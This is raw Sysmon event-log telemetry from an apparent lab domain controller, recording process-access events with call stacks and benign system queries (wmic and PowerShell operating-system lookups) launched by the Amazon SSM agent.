13:34:21.890{59A5CD1D-8E5D-6005-6A00-00000000A301}3864C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.548{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.548{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x80000000000000002301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.486{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_33l1lgil.qq4.ps12021-01-18 13:34:21.486 10341000x80000000000000002300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.467{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.457{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.456{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.456{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.456{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.456{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.456{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.456{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.455{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.454{59A5CD1D-8E5B-6005-5500-00000000A301}37483696C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.455{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_OperatingSystem" "| Select-Object" "Version, OperatingSystemSKU" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5E-6005-6E00-00000000A301}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
